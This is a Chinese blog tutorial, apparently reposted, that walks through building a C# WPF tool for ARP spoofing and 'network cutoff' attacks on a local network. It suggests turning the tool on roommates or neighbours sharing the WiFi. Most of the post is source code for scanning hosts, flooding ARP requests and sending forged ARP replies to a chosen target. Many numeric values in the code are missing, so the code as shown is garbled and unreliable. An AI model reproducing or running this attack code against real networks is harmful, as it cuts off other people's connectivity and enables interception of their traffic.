“HK”的日常之ARP断网攻击
ARP断网攻击是什么?可以吃吗?如果可以吃它好吃吗?
ARP断网攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
那就是不可以吃咯?
!???!??!?!?!
它可以做什么?可不可以吃呢?
可以应用于很多方面,例如你有一个占用的网速的室友或蹭WIFI的邻居。
警告:本教程仅作为学习研究,禁止其他用途!
---富强、民主、文明、和谐, 自由、平等、公正、法治, 爱国、敬业、诚信、友善---
进入正题,喵
一、配置开发环境
1.首先需要安装Winpcap,https://www.winpcap.org/install/
2.建立一只WPF项目(C#也可以)
3.我们需要导入2只DLL,待会在下面会有下载链接。

二、配置界面
大概像酱紫:

界面和背景图
二、编码
首先我们需要一些帮助类:
(ArpTools.cs)
using PacketDotNet;
using SharpPcap;
using SharpPcap.LibPcap;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Text;
using System.Threading;
using System.Threading.Tasks; namespace LemonArp
{
class ArpTool
{
public event EventHandler<ResolvedEventArgs> ResolvedEvent;
public event EventHandler<EventArgs> ScanStopedEvent; private LibPcapLiveDevice _device;
private TimeSpan timeout = new TimeSpan(, , );
private System.Threading.Thread scanThread = null;
private System.Threading.Thread arpSpoofingThread = null;
public ArpTool(LibPcapLiveDevice device)
{
_device = device; foreach (var address in _device.Addresses)
{
if (address.Addr.type == Sockaddr.AddressTypes.AF_INET_AF_INET6)
{
if (address.Addr.ipAddress.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
{
LocalIP = address.Addr.ipAddress;
break;
}
}
} foreach (var address in device.Addresses)
{
if (address.Addr.type == SharpPcap.LibPcap.Sockaddr.AddressTypes.HARDWARE)
{
LocalMAC = address.Addr.hardwareAddress;
}
} GetwayIP = _device.Interface.GatewayAddress;
GetwayMAC = Resolve(GetwayIP);
} public IPAddress LocalIP { get; private set; } public IPAddress GetwayIP { get; private set; } public PhysicalAddress LocalMAC { get; private set; } public PhysicalAddress GetwayMAC { get; private set; } public void ScanLAN(IP startIP, IP endIP)
{
var targetIPList = new List<IPAddress>();
while (!startIP.Equals(endIP))
{
targetIPList.Add(startIP.IPAddress);
startIP.AddOne();
} var arpPackets = new Packet[targetIPList.Count];
for (int i = ; i < arpPackets.Length; ++i)
{
arpPackets[i] = BuildRequest(targetIPList[i], LocalMAC, LocalIP);
}
String arpFilter = "arp and ether dst " + LocalMAC.ToString();
_device.Open(DeviceMode.Promiscuous, );
_device.Filter = arpFilter; scanThread = new System.Threading.Thread(() =>
{
for (int i = ; i < arpPackets.Length; ++i)
{
var lastRequestTime = DateTime.FromBinary();
var requestInterval = new TimeSpan(, , );
var timeoutDateTime = DateTime.Now + timeout;
while (DateTime.Now < timeoutDateTime)
{
if (requestInterval < (DateTime.Now - lastRequestTime))
{
_device.SendPacket(arpPackets[i]);
lastRequestTime = DateTime.Now;
}
var reply = _device.GetNextPacket();
if (reply == null)
{
continue;
}
var packet = PacketDotNet.Packet.ParsePacket(reply.LinkLayerType, reply.Data); var arpPacket = PacketDotNet.ARPPacket.GetEncapsulated(packet);
if (arpPacket == null)
{
continue;
}
if (arpPacket.SenderProtocolAddress.Equals(targetIPList[i]))
{
if (ResolvedEvent != null)
{
ResolvedEvent(this, new ResolvedEventArgs()
{
IPAddress = arpPacket.SenderProtocolAddress,
PhysicalAddress = arpPacket.SenderHardwareAddress
});
}
break;
}
}
}
_device.Close();
Console.WriteLine("exit scan");
if (ScanStopedEvent != null)
{
ScanStopedEvent(this, new EventArgs());
}
});
scanThread.Start();
} public void StopScanLan()
{
if (scanThread != null && scanThread.ThreadState == System.Threading.ThreadState.Running)
{
scanThread.Abort();
if (_device.Opened) _device.Close();
}
} public PhysicalAddress Resolve(IPAddress destIP)
{
var request = BuildRequest(destIP, LocalMAC, LocalIP);
String arpFilter = "arp and ether dst " + LocalMAC.ToString();
_device.Open(DeviceMode.Promiscuous, );
_device.Filter = arpFilter;
var lastRequestTime = DateTime.FromBinary(); var requestInterval = new TimeSpan(, , ); PacketDotNet.ARPPacket arpPacket = null;
var timeoutDateTime = DateTime.Now + timeout;
while (DateTime.Now < timeoutDateTime)
{
if (requestInterval < (DateTime.Now - lastRequestTime))
{
_device.SendPacket(request);
lastRequestTime = DateTime.Now;
}
var reply = _device.GetNextPacket();
if (reply == null)
{
continue;
} var packet = PacketDotNet.Packet.ParsePacket(reply.LinkLayerType, reply.Data); arpPacket = PacketDotNet.ARPPacket.GetEncapsulated(packet);
if (arpPacket == null)
{
continue;
}
if (arpPacket.SenderProtocolAddress.Equals(destIP))
{
break;
}
} _device.Close(); if (DateTime.Now >= timeoutDateTime)
{
return null;
}
else
{
return arpPacket.SenderHardwareAddress;
}
} public void ARPStorm(List<IPAddress> requestIPList)
{
d = ;
List<Packet> packetList = new List<Packet>();
foreach (var ip in requestIPList)
{
var packet = BuildRequest(ip, LocalMAC, LocalIP);
packetList.Add(packet);
} StopARPSpoofing();
_device.Open(DeviceMode.Promiscuous, );
arpSpoofingThread = new System.Threading.Thread(() =>
{
while (true)
{
foreach (var packet in packetList)
{
_device.SendPacket(packet);
System.Threading.Thread.Sleep();
d++;
}
}
});
arpSpoofingThread.IsBackground = true;
arpSpoofingThread.Start();
} public void ARPSpoofing1(IPAddress destIP, PhysicalAddress MAC)
{
var packet = BuildResponse(GetwayIP, GetwayMAC, destIP, LocalMAC);
Console.WriteLine("start arp spoofing 1, dest ip {0}", destIP);
StartARPSpoofing(packet);
}
public void ARPSpoofing2(IPAddress destIP, PhysicalAddress destMac, PhysicalAddress wrongMAC = null)
{
if (wrongMAC == null)
{
wrongMAC = GetRandomPhysicalAddress();
}
var packet = BuildResponse(destIP, destMac, GetwayIP, wrongMAC);
Console.WriteLine("start arp spoofing 2, dest ip {0}, dest mac {1}, getway ip {2}, getwaymac {3}",
destIP, destMac, GetwayIP, wrongMAC);
StartARPSpoofing(packet);
} public void StopARPSpoofing()
{
if (arpSpoofingThread != null && arpSpoofingThread.ThreadState != System.Threading.ThreadState.Unstarted)
{
arpSpoofingThread.Abort();
if (_device.Opened)
_device.Close();
Console.WriteLine("stop arp spoofing");
}
}
public int d = ;
private void StartARPSpoofing(Packet packet)
{
d = ;
StopARPSpoofing();
_device.Open(DeviceMode.Promiscuous, );
arpSpoofingThread = new System.Threading.Thread(() =>
{
while (true)
{
_device.SendPacket(packet);
Thread.Sleep();
d++;
}
});
arpSpoofingThread.IsBackground = true;
arpSpoofingThread.Start();
} private PhysicalAddress GetRandomPhysicalAddress()
{
Random random = new Random(Environment.TickCount);
byte[] macBytes = new byte[] { 0x9C, 0x21, 0x6A, 0xC3, 0xB0, 0x27 };
macBytes[] = (byte)random.Next();
Console.WriteLine(new PhysicalAddress(macBytes));
return new PhysicalAddress(macBytes);
} private Packet BuildResponse(IPAddress destIP, PhysicalAddress destMac, IPAddress senderIP, PhysicalAddress senderMac)
{
var ethernetPacket = new EthernetPacket(senderMac, destMac, EthernetPacketType.Arp);
var arpPacket = new ARPPacket(ARPOperation.Response, destMac, destIP, senderMac, senderIP);
ethernetPacket.PayloadPacket = arpPacket; return ethernetPacket;
} private Packet BuildRequest(IPAddress destinationIP, PhysicalAddress localMac, IPAddress localIP)
{
var ethernetPacket = new EthernetPacket(localMac,
PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"),
PacketDotNet.EthernetPacketType.Arp);
var arpPacket = new ARPPacket(PacketDotNet.ARPOperation.Request,
PhysicalAddress.Parse("00-00-00-00-00-00"),
destinationIP,
localMac,
localIP);
ethernetPacket.PayloadPacket = arpPacket; return ethernetPacket;
}
}
}
(IP.cs)
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Text; namespace LemonArp
{
class IP
{
public byte[] IPBytes { get; private set; } public IPAddress IPAddress
{
get
{
return new IPAddress(IPBytes);
}
} public IP(IPAddress ip)
{
IPBytes = ip.GetAddressBytes();
} public void AddOne()
{
int i = ;
while (i >= )
{
if (IPBytes[i] == )
{
IPBytes[i] = ;
i--;
}
else
{
IPBytes[i]++;
break;
}
}
} public override bool Equals(object obj)
{
var ip = obj as IP;
for (int i = ; i < IPBytes.Length; ++i)
{
if (ip.IPBytes[i] != IPBytes[i])
return false;
} return true;
} public override int GetHashCode()
{
return base.GetHashCode();
} public bool SmallerThan(IP ip)
{
for (int i = ; i < IPBytes.Length; ++i)
{
if (IPBytes[i] < ip.IPBytes[i])
return true;
}
return false;
}
}
}
(ResolvedEventArgs.cs)
namespace LemonArp
{
class ResolvedEventArgs:EventArgs
{
public IPAddress IPAddress { get; set; } public PhysicalAddress PhysicalAddress { get; set; }
}
}
接着,我们需要定义一些字段,帮助我们使用这些类
System.Windows.Forms.Timer timer1 = new System.Windows.Forms.Timer();
private LibPcapLiveDeviceList deviceList;
private ArpTool arpTool = null;
private List<Tuple<IPAddress, PhysicalAddress>> IPMACMapList;
Timer你可以使用其他的,但属性就不同了。
在窗口的构造函数中,我们先设定好他们
IPMACMapList = new List<Tuple<IPAddress, PhysicalAddress>>();
timer1.Interval = ;
timer1.Tick += delegate {tit.Text = "攻击次数:" + arpTool.d; };
当窗口加载完成时,我们需要为接下来的ARP攻击做准备:扫描可用的网卡设备
deviceList = LibPcapLiveDeviceList.Instance;
if (deviceList.Count < )
{
throw new Exception("没有发现本机上的网络设备");
}
foreach (var device in deviceList)
{
try
{
arpTool = new ArpTool(device);
arpTool.ScanStopedEvent += delegate { this.Dispatcher.BeginInvoke(new Action(async delegate { tit.Text = "IP扫描完成"; await Task.Delay(); tit.Text = "请选择要攻击的IP"; sra.Text = "搜索"; })); };
arpTool.ResolvedEvent += arpTool_ResolvedEvent;
tit.Text = "网关IP: " + arpTool.GetwayIP + " 本地IP: " + arpTool.LocalIP;
stip .Text =clip.Text = arpTool.GetwayIP.ToString();
if (arpTool.GetwayIP.ToString() != "")
return;
}
catch { }
}
和一只处理搜索结果的事件:
private void arpTool_ResolvedEvent(object sender, ResolvedEventArgs e)
{
IPMACMapList.Add(new Tuple<IPAddress, PhysicalAddress>(e.IPAddress, e.PhysicalAddress));
this.Dispatcher.BeginInvoke(new Action(delegate { dt.Items.Add(new ListBoxItem() { Content = $"{e.IPAddress} - {e.PhysicalAddress}", ToolTip = e.IPAddress }); }));
}
准备工作快要完成了,我们需要在局域网中查找可用的设备,只要是连接到你的WIFI的设备
if (sra.Text == "搜索")
{
IPAddress startIP, endIP;
if (!IPAddress.TryParse(stip.Text, out startIP) || !IPAddress.TryParse(clip.Text, out endIP))
{
tit.Text = "不正确的IP地址";
return;
} IP start = new IP(startIP);
IP end = new IP(endIP);
if (end.SmallerThan(start))
{
tit.Text = "开始地址大于结束地址";
return;
} sra.Text = "停止";
IPMACMapList.Clear();
dt.Items.Clear();
arpTool.ScanLAN(start, end);
}
else
{
arpTool.StopScanLan();
sra.Text = "搜索";
}
接下要响应当你选中搜索到的设备时发生的事件
private void dt_SelectionChanged(object sender, SelectionChangedEventArgs e)
{
if (dt.SelectedIndex != -)
dtip.Text = (dt.SelectedItem as ListBoxItem).ToolTip.ToString();
}
准备工作完成,接下来可以发送ARP攻击报文了:
if (but.Text == "攻击")
{
if (dtip.Text != "")
{
timer1.Start();
var destIP = IPMACMapList[dt.SelectedIndex].Item1;
var destMAC = IPMACMapList[dt.SelectedIndex].Item2;
arpTool.ARPSpoofing1(destIP, destMAC);
but.Text = "停止";
}
else { tit.Text = "请选择一只你要攻击的IP"; }
}
else
{
timer1.Stop();
arpTool.StopARPSpoofing();
but.Text = "攻击";
}
三、测试
接下来有请,额,我的 ..um..手机上场

攻击中。。。突突突
然后嘞,手机废了,QAQ
开源地址:https://github.com/TwilightLemon/LemonArp
“HK”的日常之ARP断网攻击的更多相关文章
- arp断网攻击解决办法
局域网中有这个提示arp断网攻击是正常的,说明防火墙已经拦截了,是有人用P2P工具控制你的网速,或者是局域网有机器中病毒了也会有这样的提示,不过不用担心,今天给大家带来几个防止arp断网攻击的办法,希 ...
- python通过scapy模块进行arp断网攻击
前言: 想实现像arpsoof一样的工具 arp断网攻击原理: 通过伪造IP地址与MAC地址实现ARP欺骗,在网络发送大量ARP通信量.攻击者 只要持续不断发送arp包就能造成中间人攻击或者断网攻击. ...
- arp断网攻击
arp断网攻击可以是同局域网内主机无法上网!(可恶搞室友哦,嘻嘻!) 实现原理 arp的中文释义是地址解析协议,全英文 address resolution protocol,是一个将局域网IP地址映 ...
- ARP局域网断网攻击
Kali--ARP局域网攻击 什么是ARP? ARP ( Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC ...
- ARP攻击之Kali Linux局域网断网攻击
特别声明: 我们学习研究网络安全技术的目的应是为了维护网络世界的安全,保护自己和他人的私有信息不被非法窃取和传播.请您遵守您所在地的法律,请勿利用本文所介绍的相关技术做背离道德或者违反法律的事情. S ...
- Kali下进行局域网断网攻击
今天我就来演示一下在kali下的局域网断网攻击,即ARP地址欺骗,下图所要用到的arp地址欺骗状态图: 则: 第一步:假设主机A访问某网站,那么要告知某网站我的IP和MAC地址,但这是以广播的方式告知 ...
- Kali Day01 --- arpspoof命令进行断网攻击(ARP欺骗)
root@kali:~/文档# arpspoof -i eth0 -t 172.20.151.* 172.20.151.1 34:64:a9:36:4:b7 0:0:0:0:0:0 0806 42: ...
- yersinia的DHCP池耗尽断网攻击
http://jingyan.baidu.com/article/0eb457e5045bd703f1a9051d.html yersinia -G
- 用kali执行arp攻击-----------使对方断网
实现原理 其主要原理是局域网内的"攻击机"通过冒充同网络号下的"受害者主机"的物理地址(mac地址),通过欺骗网关,让网关原来应该发给"受害者主机&q ...
随机推荐
- App架构经验总结(转载)
原文地址:http://www.iteye.com/news/31472 架构因人而异,不同的架构师大多会有不同的看法:架构也因项目而异,不同的项目需求不同,相应的架构也会不同.然而,有些东西还是通用 ...
- nodejs6下使用koa2
koa2里面使用ES7的语法,如async.await所以需要运行在node7.6之后:但在node7.6之前也可以利用babel是的koa2可以运行. 首先项目中安装babel,和babel的几个模 ...
- /usr/bin/python^M: 解释器错误: 没有那个文件或目录
遇见问题 因为linux在虚拟机中,所以就在本地敲python代码,敲完后再拿到虚拟机去执行,再输入./filename.py时,就遇到这样的一个问题: bash: ./filename.py: /u ...
- MySql学习笔记(一) —— 数据的分组
前面介绍的聚集函数只是用来计算行数,平均数,最大值,最小值而不用检索所有数据.通过count()函数,我们可以计算生产商1003提供的产品数目,但如果我要查询所有生产商提供的商品数,这就需要进行分组查 ...
- Django初探——工程创建以及models数据库相关配置
Python的WEB框架有Django.Tornado.Flask 等多种,Django相较与其他WEB框架其优势为:大而全,框架本身集成了ORM.模型绑定.模板引擎.缓存.Session等诸多功能. ...
- Thinkphp5使用阿里大于短信验证
现在各种平台登录验证很多时候会使用短信验证,快捷安全,有很多平台提供短信验证服务,相比较而言阿里大于价格比较便宜,快捷,所以在在千锋日常的php教学中多以此为例来说明短信验证的使用.下面我们在tp5中 ...
- Nim 博弈和 sg 函数
sg 函数 参考 通俗易懂 论文 几类经典的博弈问题 阶梯博弈: 只考虑奇数号楼梯Nim,若偶数楼梯只作容器,那么游戏变为Nim.题目 翻转硬币: 局面的SG值为局面中每个正面朝上的棋子单一存在时的S ...
- 怎么一次性获取form所有的值?rerialize() 、 serializeArray()方法的使用
from直接提交当然方便,但是有时候需要对数据进行处理再用ajax提交,挨个去获取值未免太麻烦,讲两个一次性获取所有值的方法. 方法1 $("form").serialize(); ...
- PHP的面向对象 — 封装、继承、多态
K在上一次的基础篇中给大家介绍了一下关于PHP中数组和字符串的使用方法等,这一次,K决定一次性大放送,给大家分享一下PHP中面向对象的三大特性:封装.继承.多态三个方面的知识. 一.封装 在PHP中, ...
- python通过excel对数据库插入数据
1.需要有两个包文件xlrd及MySQLdb(其他数据库可以另外找) 2.读取excel文件信息 book = xlrd.open_workbook(文件地址) 3.建立MySQL链接 databas ...